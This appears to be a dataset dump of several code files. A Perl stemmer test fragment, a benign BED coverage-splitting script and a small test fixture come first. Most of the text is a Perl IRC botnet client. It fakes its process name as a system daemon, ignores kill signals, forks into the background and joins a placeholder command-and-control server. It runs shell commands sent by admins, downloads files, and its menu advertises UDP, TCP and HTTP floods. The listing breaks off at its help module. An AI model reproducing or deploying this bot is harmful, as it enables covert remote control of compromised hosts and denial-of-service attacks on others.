is stem('życia'), 'życ', 'remove -ia';
is stem('gdzie'), 'gdz', 'remove -ie';
| 42.326531 | 60 | 0.534957 |
ed00fb763d173a7f452f683039e4e4cd9aa4fef9 | 641 | pl | Perl | CSAR_utils/split_coverage_by_chrom.pl | GregoryLab/structure | ee7713127bf4be5230f0a4f37a4b238b33861390 | [
"Unlicense"
] | null | null | null | CSAR_utils/split_coverage_by_chrom.pl | GregoryLab/structure | ee7713127bf4be5230f0a4f37a4b238b33861390 | [
"Unlicense"
] | null | null | null | CSAR_utils/split_coverage_by_chrom.pl | GregoryLab/structure | ee7713127bf4be5230f0a4f37a4b238b33861390 | [
"Unlicense"
] | null | null | null | #!/usr/bin/perl -w
use strict;
# split a 3-column input BED file of (coverage) values by chromosome
# (assumes the input is grouped by chromosome; if a chromosome reappears
# later in the file, its output file is reopened and overwritten)
my $usage = "Usage: perl $0 <input_bed> <out_prefix>";
my $infile = shift or die $usage;
my $outprefix= shift or die $usage;
open(IN, "<$infile") || die "Unable to open $infile: $!";
my $current_chrom = "";
while (my $line = <IN>) {
chomp $line;
my ($chrom, $pos, $value) = split(/\t/, $line);
if ($chrom ne $current_chrom) {
# open a new file
if ($current_chrom ne "") {
close(OUT);
}
open(OUT, ">$outprefix.$chrom.coverage.txt") || die "Unable to write to: $!";
$current_chrom = $chrom;
}
printf OUT "$value\n";
}
close(OUT);
| 22.103448 | 79 | 0.617785 |
edad5db5f03a502204e7556f4b402946e8ce57e9 | 163 | t | Perl | tests/unit/default/syntax-error/077-create-table-dot-column-after.x.t | Vovan-VE/lazymgen | 7968a1e9c24966eb38cab1e1f8d5b77f5bc6669b | [
"MIT"
] | null | null | null | tests/unit/default/syntax-error/077-create-table-dot-column-after.x.t | Vovan-VE/lazymgen | 7968a1e9c24966eb38cab1e1f8d5b77f5bc6669b | [
"MIT"
] | null | null | null | tests/unit/default/syntax-error/077-create-table-dot-column-after.x.t | Vovan-VE/lazymgen | 7968a1e9c24966eb38cab1e1f8d5b77f5bc6669b | [
"MIT"
] | null | null | null | ---- IN ----
+%table.name:int>|
---- OUT ----
---- ERR ----
syntax: expected <name> after `+%table.name:int>` near `|` at position 17 - at line 1
---- EXIT ----
1
| 20.375 | 85 | 0.509202 |
ed4803cb0ae23b8624215ec427cbb1d12bff14f4 | 44,469 | pl | Perl | SenpaiIRC/bot.pl | 1Dragos12/arhive | 46dd676e3f9ebb1879a12b899a335ca7f5c1b8c6 | [
"MIT"
] | null | null | null | SenpaiIRC/bot.pl | 1Dragos12/arhive | 46dd676e3f9ebb1879a12b899a335ca7f5c1b8c6 | [
"MIT"
] | null | null | null | SenpaiIRC/bot.pl | 1Dragos12/arhive | 46dd676e3f9ebb1879a12b899a335ca7f5c1b8c6 | [
"MIT"
] | null | null | null | #!/usr/bin/perl
######################################################################################################################
## [ Channel ] #################### [ Flood Attack ] ########################### [ Utils ] ###########################
######################################################################################################################
## !u @join <#channel> ## !u @udp1 <ip> <port> <time> ## !u @cback <ip> <port> ##
## !u @part <#channel> ## !u @udp2 <ip> <packet size> <time> ## !u @downlod <url+path> <file> ##
## !u !uejoin <#channel> ## !u @udp3 <ip> <port> <time> ## !u @portscan <ip> ##
## !u !op <channel> <nick> ## !u @tcp <ip> <port> <packet size> <time> ## !u @mail <subject> <sender> ##
## !u !deop <channel> <nick> ## !u @http <site> <time> ## <recipient> <message> ##
## !u !voice <channel> <nick> ## ## !u pwd;uname -a;id <for example> ##
## !u !devoice <channel> <nick> ## !u @ctcpflood <nick> ## !u @port <ip> <port> ##
## !u !nick <newnick> ## !u @msgflood <nick> ## !u @dns <ip/host> ##
## !u !msg <nick> ## !u @noticeflood <nick> ## ##
## !u !quit ## ## ##
## !u !uaw ## ## ##
## !u @die ## ## ##
## ## ## ##
######################################################################################################################
######################################################################################################################
#############################
##### [ Configuration ] #####
#############################
my @rps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"/usr/sbin/sshd -i",
"/usr/sbin/sshd",
"/usr/sbin/sshd -D",
"/usr/sbin/apache2 -k start",
"/sbin/syslogd",
"/sbin/klogd -c 1 -x -x",
"/usr/sbin/acpid",
"/usr/sbin/cron");
my $process = $rps[rand scalar @rps];
my @rversion = ("\001VERSION - unknown command.\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("BoT[00] - [#E]","BoT[01] - [#E]","BoT[02] - [#E]","BoT[03] - [#E]","BoT[04] - [#E]","BoT[05] - [#E]","BoT[06] - [#E]","BoT[07] - [#E]","BoT[08] - [#E]","BoT[09] - [#E]",
"BoT[10] - [#E]","BoT[11] - [#E]","BoT[12] - [#E]","BoT[13] - [#E]","BoT[14] - [#E]","BoT[15] - [#E]","BoT[16] - [#E]","BoT[17] - [#E]","BoT[18] - [#E]","BoT[19] - [#E]",
"BoT[20] - [#E]","BoT[21] - [#E]","BoT[22] - [#E]","BoT[23] - [#E]","BoT[24] - [#E]","BoT[25] - [#E]","BoT[26] - [#E]","BoT[27] - [#E]","BoT[28] - [#E]","BoT[29] - [#E]",
"BoT[30] - [#E]","BoT[31] - [#E]","BoT[32] - [#E]","BoT[33] - [#E]","BoT[34] - [#E]","BoT[35] - [#E]","BoT[36] - [#E]","BoT[37] - [#E]","BoT[38] - [#E]","BoT[39] - [#E]",
"BoT[40] - [#E]","BoT[41] - [#E]","BoT[42] - [#E]","BoT[43] - [#E]","BoT[44] - [#E]","BoT[45] - [#E]","BoT[46] - [#E]","BoT[47] - [#E]","BoT[48] - [#E]","BoT[49] - [#E]",
"BoT[50] - [#E]","BoT[51] - [#E]","BoT[52] - [#E]","BoT[53] - [#E]","BoT[54] - [#E]","BoT[55] - [#E]","BoT[56] - [#E]","BoT[57] - [#E]","BoT[58] - [#E]","BoT[59] - [#E]",
"BoT[60] - [#E]","BoT[61] - [#E]","BoT[62] - [#E]","BoT[63] - [#E]","BoT[64] - [#E]","BoT[65] - [#E]","BoT[66] - [#E]","BoT[67] - [#E]","BoT[68] - [#E]","BoT[69] - [#E]",
"BoT[70] - [#E]","BoT[71] - [#E]","BoT[72] - [#E]","BoT[73] - [#E]","BoT[74] - [#E]","BoT[75] - [#E]","BoT[76] - [#E]","BoT[77] - [#E]","BoT[78] - [#E]","BoT[79] - [#E]",
"BoT[80] - [#E]","BoT[81] - [#E]","BoT[82] - [#E]","BoT[83] - [#E]","BoT[84] - [#E]","BoT[85] - [#E]","BoT[86] - [#E]","BoT[87] - [#E]","BoT[88] - [#E]","BoT[89] - [#E]",
"BoT[90] - [#E]","BoT[91] - [#E]","BoT[92] - [#E]","BoT[93] - [#E]","BoT[94] - [#E]","BoT[95] - [#E]","BoT[96] - [#E]","BoT[97] - [#E]","BoT[98] - [#E]","BoT[99] - [#E]",
"BoT[100] - [#E]","BoT[101] - [#E]","BoT[102] - [#E]","BoT[103] - [#E]","BoT[104] - [#E]","BoT[105] - [#E]","BoT[106] - [#E]","BoT[107] - [#E]","BoT[108] - [#E]","BoT[109] - [#E]",
"BoT[110] - [#E]","BoT[111] - [#E]","BoT[112] - [#E]","BoT[113] - [#E]","BoT[114] - [#E]","BoT[115] - [#E]","BoT[116] - [#E]","BoT[117] - [#E]","BoT[118] - [#E]","BoT[119] - [#E]",
"BoT[120] - [#E]","BoT[121] - [#E]","BoT[122] - [#E]","BoT[123] - [#E]","BoT[124] - [#E]","BoT[125] - [#E]","BoT[126] - [#E]","BoT[127] - [#E]","BoT[128] - [#E]","BoT[129] - [#E]",
"BoT[130] - [#E]","BoT[131] - [#E]","BoT[132] - [#E]","BoT[133] - [#E]","BoT[134] - [#E]","BoT[135] - [#E]","BoT[136] - [#E]","BoT[137] - [#E]","BoT[138] - [#E]","BoT[139] - [#E]",
"BoT[140] - [#E]","BoT[141] - [#E]","BoT[142] - [#E]","BoT[143] - [#E]","BoT[144] - [#E]","BoT[145] - [#E]","BoT[146] - [#E]","BoT[147] - [#E]","BoT[148] - [#E]","BoT[149] - [#E]",
"BoT[150] - [#E]","BoT[151] - [#E]","BoT[152] - [#E]","BoT[153] - [#E]","BoT[154] - [#E]","BoT[155] - [#E]","BoT[156] - [#E]","BoT[157] - [#E]","BoT[158] - [#E]","BoT[159] - [#E]",
"BoT[160] - [#E]","BoT[161] - [#E]","BoT[162] - [#E]","BoT[163] - [#E]","BoT[164] - [#E]","BoT[165] - [#E]","BoT[166] - [#E]","BoT[167] - [#E]","BoT[168] - [#E]","BoT[169] - [#E]",
"BoT[170] - [#E]","BoT[171] - [#E]","BoT[172] - [#E]","BoT[173] - [#E]","BoT[174] - [#E]","BoT[175] - [#E]","BoT[176] - [#E]","BoT[177] - [#E]","BoT[178] - [#E]","BoT[179] - [#E]",
"BoT[180] - [#E]","BoT[181] - [#E]","BoT[182] - [#E]","BoT[183] - [#E]","BoT[184] - [#E]","BoT[185] - [#E]","BoT[186] - [#E]","BoT[187] - [#E]","BoT[188] - [#E]","BoT[189] - [#E]",
"BoT[190] - [#E]","BoT[191] - [#E]","BoT[192] - [#E]","BoT[193] - [#E]","BoT[194] - [#E]","BoT[195] - [#E]","BoT[196] - [#E]","BoT[197] - [#E]","BoT[198] - [#E]","BoT[199] - [#E]",
"BoT[200] - [#E]","BoT[201] - [#E]","BoT[202] - [#E]","BoT[203] - [#E]","BoT[204] - [#E]","BoT[205] - [#E]","BoT[206] - [#E]","BoT[207] - [#E]","BoT[208] - [#E]","BoT[209] - [#E]",
"BoT[210] - [#E]","BoT[211] - [#E]","BoT[212] - [#E]","BoT[213] - [#E]","BoT[214] - [#E]","BoT[215] - [#E]","BoT[216] - [#E]","BoT[217] - [#E]","BoT[218] - [#E]","BoT[219] - [#E]",
"BoT[220] - [#E]","BoT[221] - [#E]","BoT[222] - [#E]","BoT[223] - [#E]","BoT[224] - [#E]","BoT[225] - [#E]","BoT[226] - [#E]","BoT[227] - [#E]","BoT[228] - [#E]","BoT[229] - [#E]",
"BoT[230] - [#E]","BoT[231] - [#E]","BoT[232] - [#E]","BoT[233] - [#E]","BoT[234] - [#E]","BoT[235] - [#E]","BoT[236] - [#E]","BoT[237] - [#E]","BoT[238] - [#E]","BoT[239] - [#E]",
"BoT[240] - [#E]","BoT[241] - [#E]","BoT[242] - [#E]","BoT[243] - [#E]","BoT[244] - [#E]","BoT[245] - [#E]","BoT[246] - [#E]","BoT[247] - [#E]","BoT[248] - [#E]","BoT[249] - [#E]",
"BoT[250] - [#E]","BoT[251] - [#E]","BoT[252] - [#E]","BoT[253] - [#E]","BoT[254] - [#E]","BoT[255] - [#E]","BoT[256] - [#E]","BoT[257] - [#E]","BoT[258] - [#E]","BoT[259] - [#E]",
"BoT[260] - [#E]","BoT[261] - [#E]","BoT[262] - [#E]","BoT[263] - [#E]","BoT[264] - [#E]","BoT[265] - [#E]","BoT[266] - [#E]","BoT[267] - [#E]","BoT[268] - [#E]","BoT[269] - [#E]",
"BoT[270] - [#E]","BoT[271] - [#E]","BoT[272] - [#E]","BoT[273] - [#E]","BoT[274] - [#E]","BoT[275] - [#E]","BoT[276] - [#E]","BoT[277] - [#E]","BoT[278] - [#E]","BoT[279] - [#E]",
"BoT[280] - [#E]","BoT[281] - [#E]","BoT[282] - [#E]","BoT[283] - [#E]","BoT[284] - [#E]","BoT[285] - [#E]","BoT[286] - [#E]","BoT[287] - [#E]","BoT[288] - [#E]","BoT[289] - [#E]",
"BoT[290] - [#E]","BoT[291] - [#E]","BoT[292] - [#E]","BoT[293] - [#E]","BoT[294] - [#E]","BoT[295] - [#E]","BoT[296] - [#E]","BoT[297] - [#E]","BoT[298] - [#E]","BoT[299] - [#E]",
"BoT[300] - [#E]","BoT[301] - [#E]","BoT[302] - [#E]","BoT[303] - [#E]","BoT[304] - [#E]","BoT[305] - [#E]","BoT[306] - [#E]","BoT[307] - [#E]","BoT[308] - [#E]","BoT[309] - [#E]",
"BoT[310] - [#E]","BoT[311] - [#E]","BoT[312] - [#E]","BoT[313] - [#E]","BoT[314] - [#E]","BoT[315] - [#E]","BoT[316] - [#E]","BoT[317] - [#E]","BoT[318] - [#E]","BoT[319] - [#E]",
"BoT[320] - [#E]","BoT[321] - [#E]","BoT[322] - [#E]","BoT[323] - [#E]","BoT[324] - [#E]","BoT[325] - [#E]","BoT[326] - [#E]","BoT[327] - [#E]","BoT[328] - [#E]","BoT[329] - [#E]",
"BoT[330] - [#E]","BoT[331] - [#E]","BoT[332] - [#E]","BoT[333] - [#E]","BoT[334] - [#E]","BoT[335] - [#E]","BoT[336] - [#E]","BoT[337] - [#E]","BoT[338] - [#E]","BoT[339] - [#E]",
"BoT[340] - [#E]","BoT[341] - [#E]","BoT[342] - [#E]","BoT[343] - [#E]","BoT[344] - [#E]","BoT[345] - [#E]","BoT[346] - [#E]","BoT[347] - [#E]","BoT[348] - [#E]","BoT[349] - [#E]",
"BoT[350] - [#E]","BoT[351] - [#E]","BoT[352] - [#E]","BoT[353] - [#E]","BoT[354] - [#E]","BoT[355] - [#E]","BoT[356] - [#E]","BoT[357] - [#E]","BoT[358] - [#E]","BoT[359] - [#E]",
"BoT[360] - [#E]","BoT[361] - [#E]","BoT[362] - [#E]","BoT[363] - [#E]","BoT[364] - [#E]","BoT[365] - [#E]","BoT[366] - [#E]","BoT[367] - [#E]","BoT[368] - [#E]","BoT[369] - [#E]",
"BoT[370] - [#E]","BoT[371] - [#E]","BoT[372] - [#E]","BoT[373] - [#E]","BoT[374] - [#E]","BoT[375] - [#E]","BoT[376] - [#E]","BoT[377] - [#E]","BoT[378] - [#E]","BoT[379] - [#E]",
"BoT[380] - [#E]","BoT[381] - [#E]","BoT[382] - [#E]","BoT[383] - [#E]","BoT[384] - [#E]","BoT[385] - [#E]","BoT[386] - [#E]","BoT[387] - [#E]","BoT[388] - [#E]","BoT[389] - [#E]",
"BoT[390] - [#E]","BoT[391] - [#E]","BoT[392] - [#E]","BoT[393] - [#E]","BoT[394] - [#E]","BoT[395] - [#E]","BoT[396] - [#E]","BoT[397] - [#E]","BoT[398] - [#E]","BoT[399] - [#E]",
"BoT[400] - [#E]","BoT[401] - [#E]","BoT[402] - [#E]","BoT[403] - [#E]","BoT[404] - [#E]","BoT[405] - [#E]","BoT[406] - [#E]","BoT[407] - [#E]","BoT[408] - [#E]","BoT[409] - [#E]",
"BoT[410] - [#E]","BoT[411] - [#E]","BoT[412] - [#E]","BoT[413] - [#E]","BoT[414] - [#E]","BoT[415] - [#E]","BoT[416] - [#E]","BoT[417] - [#E]","BoT[418] - [#E]","BoT[419] - [#E]",
"BoT[420] - [#E]","BoT[421] - [#E]","BoT[422] - [#E]","BoT[423] - [#E]","BoT[424] - [#E]","BoT[425] - [#E]","BoT[426] - [#E]","BoT[427] - [#E]","BoT[428] - [#E]","BoT[429] - [#E]",
"BoT[430] - [#E]","BoT[431] - [#E]","BoT[432] - [#E]","BoT[433] - [#E]","BoT[434] - [#E]","BoT[435] - [#E]","BoT[436] - [#E]","BoT[437] - [#E]","BoT[438] - [#E]","BoT[439] - [#E]",
"BoT[440] - [#E]","BoT[441] - [#E]","BoT[442] - [#E]","BoT[443] - [#E]","BoT[444] - [#E]","BoT[445] - [#E]","BoT[446] - [#E]","BoT[447] - [#E]","BoT[448] - [#E]","BoT[449] - [#E]",
"BoT[450] - [#E]","BoT[451] - [#E]","BoT[452] - [#E]","BoT[453] - [#E]","BoT[454] - [#E]","BoT[455] - [#E]","BoT[456] - [#E]","BoT[457] - [#E]","BoT[458] - [#E]","BoT[459] - [#E]",
"BoT[460] - [#E]","BoT[461] - [#E]","BoT[462] - [#E]","BoT[463] - [#E]","BoT[464] - [#E]","BoT[465] - [#E]","BoT[466] - [#E]","BoT[467] - [#E]","BoT[468] - [#E]","BoT[469] - [#E]",
"BoT[470] - [#E]","BoT[471] - [#E]","BoT[472] - [#E]","BoT[473] - [#E]","BoT[474] - [#E]","BoT[475] - [#E]","BoT[476] - [#E]","BoT[477] - [#E]","BoT[478] - [#E]","BoT[479] - [#E]",
"BoT[480] - [#E]","BoT[481] - [#E]","BoT[482] - [#E]","BoT[483] - [#E]","BoT[484] - [#E]","BoT[485] - [#E]","BoT[486] - [#E]","BoT[487] - [#E]","BoT[488] - [#E]","BoT[489] - [#E]",
"BoT[490] - [#E]","BoT[491] - [#E]","BoT[492] - [#E]","BoT[493] - [#E]","BoT[494] - [#E]","BoT[495] - [#E]","BoT[496] - [#E]","BoT[497] - [#E]","BoT[498] - [#E]","BoT[499] - [#E]",
"BoT[500] - [#E]","BoT[501] - [#E]","BoT[502] - [#E]","BoT[503] - [#E]","BoT[504] - [#E]","BoT[505] - [#E]","BoT[506] - [#E]","BoT[507] - [#E]","BoT[508] - [#E]","BoT[509] - [#E]",
"BoT[510] - [#E]","BoT[511] - [#E]","BoT[512] - [#E]","BoT[513] - [#E]","BoT[514] - [#E]","BoT[515] - [#E]","BoT[516] - [#E]","BoT[517] - [#E]","BoT[518] - [#E]","BoT[519] - [#E]",
"BoT[520] - [#E]","BoT[521] - [#E]","BoT[522] - [#E]","BoT[523] - [#E]","BoT[524] - [#E]","BoT[525] - [#E]","BoT[526] - [#E]","BoT[527] - [#E]","BoT[528] - [#E]","BoT[529] - [#E]",
"BoT[530] - [#E]","BoT[531] - [#E]","BoT[532] - [#E]","BoT[533] - [#E]","BoT[534] - [#E]","BoT[535] - [#E]","BoT[536] - [#E]","BoT[537] - [#E]","BoT[538] - [#E]","BoT[539] - [#E]",
"BoT[540] - [#E]","BoT[541] - [#E]","BoT[542] - [#E]","BoT[543] - [#E]","BoT[544] - [#E]","BoT[545] - [#E]","BoT[546] - [#E]","BoT[547] - [#E]","BoT[548] - [#E]","BoT[549] - [#E]",
"BoT[550] - [#E]","BoT[551] - [#E]","BoT[552] - [#E]","BoT[553] - [#E]","BoT[554] - [#E]","BoT[555] - [#E]","BoT[556] - [#E]","BoT[557] - [#E]","BoT[558] - [#E]","BoT[559] - [#E]",
"BoT[560] - [#E]","BoT[561] - [#E]","BoT[562] - [#E]","BoT[563] - [#E]","BoT[564] - [#E]","BoT[565] - [#E]","BoT[566] - [#E]","BoT[567] - [#E]","BoT[568] - [#E]","BoT[569] - [#E]",
"BoT[570] - [#E]","BoT[571] - [#E]","BoT[572] - [#E]","BoT[573] - [#E]","BoT[574] - [#E]","BoT[575] - [#E]","BoT[576] - [#E]","BoT[577] - [#E]","BoT[578] - [#E]","BoT[579] - [#E]",
"BoT[580] - [#E]","BoT[581] - [#E]","BoT[582] - [#E]","BoT[583] - [#E]","BoT[584] - [#E]","BoT[585] - [#E]","BoT[586] - [#E]","BoT[587] - [#E]","BoT[588] - [#E]","BoT[589] - [#E]",
"BoT[590] - [#E]","BoT[591] - [#E]","BoT[592] - [#E]","BoT[593] - [#E]","BoT[594] - [#E]","BoT[595] - [#E]","BoT[596] - [#E]","BoT[597] - [#E]","BoT[598] - [#E]","BoT[599] - [#E]",
"BoT[600] - [#E]");
my $ircname = $rircname[rand scalar @rircname];
## my @rrealname = ("4,1[ GamerLoLy start HACKED ]",
## "4,1 /!\ GamerLoLy start HACKED /!\ ",
## "12,1<///8,1///4,1###>",
## "2,1---=== 4,1 GamerLoLy start HACKED 2,1===---");
## chop (my $realname = $rrealname[rand scalar @rrealname]);
chop (my $realname = $rircname[rand scalar @rircname]);
## my @nickname = ("GamerLoLy");
## my $nick =$nickname[rand scalar @nickname];
my $nick =$rircname[rand scalar @rircname];
$server = 'ip-ul de la vps' unless $server;
my $port = 'aici pui portul ex:7777';
my $linas_max='8';
my $sleep='5';
my $homedir ="/tmp";
my $version = 'Irc 2018 - GamerLoLy and #Elena';
my @admins = ("Aici pui numele la admin");
my @hostauth = ("host-ul pe care l-ai setat in unrealircd.con");
my @channels = ("Channel-ul pe care l-ai setat in unrealircd.con unde sa intre perli/pma-urile");
my $pacotes = 1;
#################################################################
##### [ Stop Editing if you dont know what are you doing. ] #####
#################################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
chdir("$homedir");
$server="$ARGV[0]"if $ARGV[0];
$0="$process"."\0"x16;;
my $pid=fork;
exit if $pid;
die"Can't fork in background: $!"unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket"$_[1]\n";
} else {
print $IRC_cur_socket"$_[0]\n";
}
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE,"> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy ="";
grep {(lc($_) eq"http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq"") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path ="/"unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
$AGENT ="get-minimal";
$VERSION ="20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .=":$port"if $port != 80;
my $request ="GET $path HTTP/1.0\015\012"
."Host: $netloc\015\012"
."User-Agent: $AGENT/$VERSION/u\015\012";
$request .="Pragma: no-cache\015\012"if ($main::http_no_cache);
$request .="\015\012";
print $sock $request;
my $buf ="";
my $n;
my $b1 ="";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq"") {
$b1 = $buf;
$buf =~ s/.+?\015?\012\015?\012//s;
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf =""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} ="$server_con";
$irc_servers{$IRC_cur_socket}{'port'} ="$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname".$IRC_socket->sockhost."$server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick","$server","$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn","".$vers."");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
if ($onde eq"$meunick"){
shell("$pn","$args");
}
if ($args =~ /^(\Q$meunick\E|\!u)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1");
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde","$arg");
}
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick-".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} ="$1";
foreach my $canal (@channels) {
sendraw("MODE $nick +x");
sendraw("JOIN $canal");
sendraw("PRIVMSG $canal :4,1 [#IRC] 9,1P̵̡͎̤̪̬͔̃͐͋o̶̠̘͎̜̭͈̺̥̳͈͒s̸̡̛͕̹̞̤̤̘̎̈́̈́͊͗̽͆ĩ̸̢̡̨̨̮̝̫̯͇̺̾̕ḇ̵̢̙̱̺̫̻̲͑́̊͋͒̽͘ͅī̴̧̖l̸̢̧͉̞̹̈́ ̶̞̱̟̜̬̖̤́̓n̶̗̖̺̟̺͓̿͛̊͗͗u̵̳̠̠͙̱̰̽̊͊̈́͋̓ ̶̮̤̊͊͑̒̈̚̚͠o̷͔̳̯̜̿̀̀͗̿̈̕ ̶̢͖̠̞̅͊͋̍̈́́s̵̱̙̭̈́̓̓͊͠ą̸̤̆̇̃͜-̷̨̥̜̫͇̱̥̈̋͐̐̀̃̓́͜͜͝ͅț̷̝͚̪̟̞͐͂̾̋͠ĩ̵̹̾̋̎́̀̊ ̸̗͚͈̼̘̔͘r̴͚͂͐̽̿͑͋͋̚ė̵̱͊̑̊̍̅̇̽ȕ̵̳̦ș̵͍̞̽̂̃̋̉̉̈́͝͝e̴̠̫̔̍̋͗̐̕a̸̙͚͙̥͈͓̘͌̇̑̽̈́̀ş̵̨̲̥̲̳́̌͑̈́̓̉ͅc̷̮͚̖̮͔̉̀́̿ẳ̶̘̜̜͕̮̓̅̐́̈́̀̈͜͠͝,̷̧͇͖̣̝̝̺̻̐̈́̔̈́͐̄̂̂͒͝ ̷͓͓͇̄d̶̝̗̙͔͇̯̻͊͜ḁ̶̡̲̰͈̺͓̻͆̀́͗́̿ṟ̵͉̣̪͌͒̄͂ ̸̻͇̒̃̒̓̾̍m̶̨̧͎͙͙̣̗͉̥͓̋̓̔͑̇́͠ë̵̩̱̜͎̣́ṛ̷͎̙̙̩̭̗̿́̿̏͂ì̸̛̯̞̄̃̀̍̏ţ̶̪̖̤͙̫̟̣̮̂̉̐̌̑͘ă̴̡̛͖̰̞̱̩̭͜ ̴̢̛̞̩̻͇̈́̈́͊ͅî̶̮̬͖̗̔͋̓̂͑̂̾͘͠ň̵̡̡̖̪̯͘ť̷̹̰̲͔̘͔̙̘̞̖ơ̴̻̮̮̱̖͍̮̓͋̓̄̀̀̈́͝t̶̛͇̋͆̅͗̋̑͘͘d̶̫̩͇͕̞͔͚̑̃͜ȩ̵̻̾̽̎̆̑̉́͝a̴̢̗̟͖̲̔̏̐̃͌̾͜ͅu̴͓̳̓̋͗̾̇͆ņ̸͎͖͕̰̙͚̏́à̸̛̟̗̣̙͗͋͊ͅ ̸͎̓͛̏̆͆͂̌̂͝ṣ̷̡̧̠̮͙̀̽̈͛͊̊̇͛͝ă̷̮̆͑ ̷̛̜͈̲͌̅̉̿̿̄̄̚î̵̢̢̡̘̜̖͚̬̔̅͠n̴͚̞̩̠͕̣̻̺̱̊c̷̥̥̫̓̿͌̂̈́̾͐̀͗̐ȅ̸̻̘̝̲̟̳̟̤̀̈́̂͋̕͝͝r̸̢̢̙͈̭͊͗̄̇͘c̵̬͈̅ĩ̶͖̟͓̮̥̻̭͙͊. ❤ ");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
###########################
##### [ Help Module ] #####
###########################
if ($funcarg =~ /^help/) {
